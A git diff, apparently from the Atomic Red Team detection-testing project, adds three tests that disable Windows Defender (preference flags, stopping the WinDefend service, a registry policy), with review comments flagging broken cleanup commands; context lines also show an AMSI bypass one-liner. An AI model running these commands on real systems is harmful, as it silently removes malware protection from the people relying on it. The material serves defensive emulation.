diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 7e5d3176..cf9cafcb 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -34,6 +34,12 @@
- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)
+- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell)
+
+- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt)
+
+- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry)
+
@@ -369,4 +375,73 @@ Credit to Matt Graeber (@mattifestation) for the research.
+
+
+
+## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
+Attempting to disable scheduled scanning and other parts of windows defender atp
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+Set-MpPreference -DisableRealtimeMonitoring 1
+Set-MpPreference -DisableBehaviorMonitoring 1
+Set-MpPreference -DisableScriptScanning 1
+Set-MpPreference -DisableBlockAtFirstSeen 1
+```
+
+
+#### Cleanup Commands:
+```
+Set-MpPreference -DisableRealtimeMonitoring 0
+Set-MpPreference -DisableBehaviorMonitoring 0
+Set-MpPreference -DisableScriptScanning 0
+Set-MpPreference -DisableBlockAtFirstSeen 0
+```
+
+
+
+
+## Atomic Test #17 - Tamper with Windows Defender Command Prompt
+Attempting to disable scheduled scanning and other parts of windows defender atp
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+```
+sc stop WinDefend
+sc config WinDefend start=disabled
+sc query WinDefend
+```
+
+
+#### Cleanup Commands:
+```
+sc start WinDefend
+sc config WinDefend start=enabled
+```
+
+
+
+
+## Atomic Test #18 - Tamper with Windows Defender Registry
+Disable Windows Defender from starting after a reboot
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
+```
+
+
+#### Cleanup Commands:
+```
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
+```
+
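Review bot: The cleanup for Atomic Test #17 will not restore the service: `sc config WinDefend start=enabled` uses a start type that `sc` does not accept (the valid values are boot, system, auto, demand, disabled and delayed-auto), and `sc start WinDefend` runs before the start type is changed back, while the service is still disabled. Reorder the cleanup so the start type is reset first, for example `sc config WinDefend start=auto` followed by `sc start WinDefend`. In Atomic Test #18 the cleanup writes `DisableAntiSpyware` as 0 instead of returning the key to its earlier state; if the value did not exist before the test, `Remove-ItemProperty` on that name is the cleaner reversal.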
diff --git a/atomics/index.md b/atomics/index.md
index 3271778c..277be38f 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -218,6 +218,9 @@
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #14: Disable PowerShell Script Block Logging [windows]
- Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
+ - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+ - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+ - Atomic Test #18: Tamper with Windows Defender Registry [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 5865102f..f2ca259b 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -7386,6 +7386,60 @@ defense-evasion:
elevation_required: false
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
+'
+ - name: Tamper with Windows Defender ATP PowerShell
+ description: 'Attempting to disable scheduled scanning and other parts of windows
+ defender atp
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: |
+ Set-MpPreference -DisableRealtimeMonitoring 1
+ Set-MpPreference -DisableBehaviorMonitoring 1
+ Set-MpPreference -DisableScriptScanning 1
+ Set-MpPreference -DisableBlockAtFirstSeen 1
+ cleanup_command: |
+ Set-MpPreference -DisableRealtimeMonitoring 0
+ Set-MpPreference -DisableBehaviorMonitoring 0
+ Set-MpPreference -DisableScriptScanning 0
+ Set-MpPreference -DisableBlockAtFirstSeen 0
+ - name: Tamper with Windows Defender Command Prompt
+ description: 'Attempting to disable scheduled scanning and other parts of windows
+ defender atp
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ sc stop WinDefend
+ sc config WinDefend start=disabled
+ sc query WinDefend
+ cleanup_command: |
+ sc start WinDefend
+ sc config WinDefend start=enabled
+ - name: Tamper with Windows Defender Registry
+ description: 'Disable Windows Defender from starting after a reboot
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
+ -Name DisableAntiSpyware -Value 1
+
+'
+ cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
+ Defender" -Name DisableAntiSpyware -Value 0
+
'
T1107:
technique:
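Review bot: The `description` of the `command_prompt` test is a copy of the PowerShell test's text ("Attempting to disable scheduled scanning and other parts of windows defender atp"), and it matches neither command set: the `Set-MpPreference` lines turn off real-time monitoring, behavior monitoring, script scanning and block at first seen, while the `sc` lines stop the WinDefend service and disable its start. Give each test a description that names what it changes, so an analyst mapping detections to the test knows which telemetry to expect, and capitalise the product name consistently with the test names. The `cleanup_command` of the `command_prompt` test also carries `start=enabled`, which is not a start type `sc config` accepts, so the entry needs the same correction as the Markdown file.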
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 30a5ce96..b9d3f405 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -48,6 +48,9 @@
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #14: Disable PowerShell Script Block Logging [windows]
- Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
+ - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+ - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+ - Atomic Test #18: Tamper with Windows Defender Registry [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)